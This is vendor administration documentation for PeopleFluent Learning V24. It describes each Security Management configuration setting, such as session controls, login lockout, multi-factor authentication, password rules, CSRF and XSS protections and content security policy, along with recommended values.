System Administration - Security Management Category
Applicable Product:
- PeopleFluent Learning
Applicable Release:
- V24
Summary:
Security Management Category
System administrators can use the table below to help them configure the system configuration settings in the Security Management category.
To configure Security Management settings, go to Manage Center > System > System Configuration and select Security Management from the Select a category drop-down list.
Table: System Configuration Settings: Security Management Category
| Setting | Type | Description |
| Security Scan Level of Input Parameters | Drop-down list | Select the level of security required for data saved to the LMS, sent via browser form fields:
Scanning actions are based on OWASP best practice guidelines. Recommended setting: High. |
| Advanced: Allow Persistent Sessions (Session Hijacking) | Check box |
Select this check box to allow persistent sessions. New login requests will be able to use a previous session cookie. This is known as session hijacking. Clear this check box to prevent new requests from reusing a previous session cookie. When this check box is cleared, a new login (or logoff) invalidates any existing login with the same user ID. PeopleFluent recommends disabling persistent sessions, although that may inconvenience some users by requiring a new login for some link and server restart scenarios. Recommended setting: disabled. |
| Advanced: Allow Concurrent Logins | Check box |
Select this check box to allow multiple concurrent logins with the same user ID. Recommended setting: disabled. |
| Advanced: IFrame Protection (Clickjacking) | Single selection |
To prevent external websites from putting an application from another domain within its own frameset, which could allow clickjacking attacks, select Allow same origin only. For external sites that include portals that embed valid application screens required for the LMS, select None. For more information about clickjacking, see the OWASP guidelines at owasp.org. Recommended setting: Allow same origin only. |
| Advanced: Disable Previous Sessions At Login | Check box |
Select this check box to allow the current login request to take precedence over previous sessions immediately, without waiting for the previous session timer (which may be 1-4 hours) to expire. This option improves usability when both the Allow Persistent Sessions and Allow Concurrent Logins settings are disabled. Recommended setting: enabled. |
| Advanced: Enforce IP Session Binding | Check box |
Select this check box to require the IP address used at login be the source for all subsequent TX requests. This can protect against session hijacking, although keep in mind that offices that use gateways may map all requests from the same office to the same IP address. This setting may need to be disabled for some scenarios where remote courses or portals are used from third-party servers. Recommended setting: enabled. |
| Maximum Failed Log-In Attempts | Number (Min=0, Max=20) |
Enter the maximum number of failed login attempts before the user's account status is set to Suspended. This helps to prevent hacking attempts on known user IDs. Recommended setting: 5. |
| Suspension Interval (# minutes) | Number (Min=0, Max=120) |
Enter the number of minutes to suspend the user account when the Maximum Failed Login Attempts has been exceeded. Enter 0 to suspend the account indefinitely or until it is reactivated by an administrator. Recommended setting: 15. |
| Minimum Password Length | Number (Min=1, Max=15) |
Enter the minimum character length for user passwords. Recommended setting: 15. |
| Enable Multi-Factor Authentication | Check box |
Turning this on will enable Enable Multi-Factor Authentication for all users. Recommended setting: Enabled |
| Multi-Factor Authentication re-authentication period (Days) | Number (Min=1, Max=90) |
The number of days allowed before MFA is required to login again. Recommended setting: 30 |
| "Multi-Factor Authentication code validity period (Minutes) | Number (Min=1, Max=60) |
The number of minutes that the one time passcode is valid. The code will immediately become invalid if the current login attempt fails. Recommended setting: 5 |
| Maximum number of Multi-Factor Authentication attempts | Number (Min=1, Max=15) |
The maximum number of MFA attempts before the account is locked. Recommended setting: 5 |
| Password Change Interval (# days) | Number (Min=0, Max=99999) |
Enter the numbers of days since the last password change to prompt for a new password. The interval is checked each time users log in. Recommended setting: 0. |
| Maximum Days of Inactivity Allowed for Accounts | Number (Min=0, Max=365) |
Enter the maximum number of days' inactivity before the user's account status is set to either Closed or Suspended, depending on whether the Set Inactive Accounts to Suspended setting is enabled or not. Recommended setting: 0. |
| Force First Log-In Password Change | Check box |
Select this check box to force users to change their password the first time they log into the LMS. Recommended setting: enabled. |
| Require Strong Passwords | Check box |
Select this check box to require users to choose a password that is difficult to guess. These include a mix of alphanumeric characters, a minimum of six characters, and cannot contain simple phrases, such as abc123, qwerty and password. Recommended setting: enabled. |
| Number of Previous Passwords That Cannot Be Reused | Number (Min=1, Max=99) |
Enter the number of previous passwords—going backwards from the current password—that cannot be reused when setting a new password. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 5. |
| Number of Digit(s) in a Strong Password | Number (Min=0, Max=2) |
Enter the number of digits that must be present in a strong password. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 1. |
| Number of Special Character(s) in a Strong Password | Number (Min=0, Max=2) |
Enter the number of special characters that must be present in a strong password. Special characters are non-alphanumeric. This setting requires the Require Strong Passwords setting to be enabled. Recommended setting: 1. |
| Set Inactive Accounts to Suspended | Check box |
Select this check box to set inactive user accounts to Suspended instead of Closed. Recommended setting: disabled. |
| Allow Catalog Level Permissions for Session Selector | Check box |
Select this check box to use only catalog level read permissions to filter the learning object session selector in report queries. Clear the check box to use catalog, module and session level permissions. This setting is included for backwards compatibility and PeopleFluent recommends clearing it to use module and session level permissions. Recommended setting: disabled. |
| Enable CSRF validation for login requests. | Check box |
Select this check box to enable cross-site request forgery (CSRF) protection on the native LMS login page. A token value is added to the login form and validated when the form is submitted. Recommended setting: enabled. Customers who use external login pages must leave this check box cleared for their login pages to function. |
| Repository Permissions Level | Single selection |
Select Files to apply access permissions to files (in addition to folders) in the Repository Manager. Select Folders to apply access permissions at the folder level only. If the repository contains a lot of files, selecting Folders can greatly improve LMS performance. Recommended setting: Folders. |
| Minimal Authentication Response | Check box |
Select this check box to return a single response code for login failures. Returning as little information as possible to potential hackers is a security best practice. Recommended setting: enabled. |
| Disallowed File Extensions | Text | Enter a comma-separated list of file extensions to specify the file types that cannot be imported into the LMS, to reduce security risks. For example, .exe,.bat,.jsp. |
| Allowed General User File Extensions | Text |
Enter a comma-separated list of file extensions to specify the file types that do not require special role permissions to be uploaded to the LMS. This list is checked wherever a user can upload files (for example, skins, content packages and repository items). Leave this field blank to allow all file types to be uploaded. Example file types typically uploaded can include:
|
| Enforce No-Store Header Response | Check box |
Select this check box to enforce the no-store cache control directive in HTTP responses, so that they are not stored in any cache. This does not prevent a valid pre-existing cached response being returned. Recommended setting: enabled. |
| Trusted apps | Text box |
Enter a list of trusted apps, one per line. For example, talentslate:///oauth http://www.lmsserver.com/folder/netdimensions-slate/sso |
| Enforce Repository Access Control on Secure Servlet | Check box |
Select this check box to enforce access permission rules when accessing repository files via a secure servlet. Recommended setting: enabled. |
| Enable spreadsheet formula injection protection | Check box |
Select this check box to protect the LMS from spreadsheet formula injection attempts. When enabled, all fields in CSV or XLS outputs are prepended with a single quote if it begins with any of the these characters:
Recommended setting: enabled. |
| Enable cross-site scripting protection | Drop-down list |
Select the level of protection from cross-site scripting (XSS). When enabled, this option controls the value of the X-XSS-Protection HTTP response header, and stops pages from loading when browsers detect reflected XSS attacks. Recommended setting: Enable and block. |
| Disable content sniffing | Check box |
Select this check box to add an X-Content-Type-Options: nosniff header to HTTP responses. This indicates that the MIME types advertised in the Content-Type headers must be followed and should not be changed. This setting provides a way to opt out of MIME type sniffing, or, in other words, to say that the MIME types are deliberately configured. Recommended setting: enabled. |
| Enable Referrer Policy | Drop-down list |
Select an option to determine how the value of the referrer header is set in links external to the current site. The default value is Strict origin when cross origin. |
| Enable Permission Policy | Drop-down list |
This provides a mechanism to allow and deny the use of browser features, in this case, allowing the browser to make a PeopleFluent Learning window full screen. The default value is All. Select an option: |
| Content Security Policy | Text box |
This option defines approved sources of content (such as JavaScript and CSS) that the browser may load. It can be an effective countermeasure to Cross Site Scripting (XSS) attacks. The Content Security Policy header value is made up of one or more directives. The default for this setting is script-src 'self' 'unsafe-inline' 'unsafe-eval';. Separate multiple directives with a semicolon. |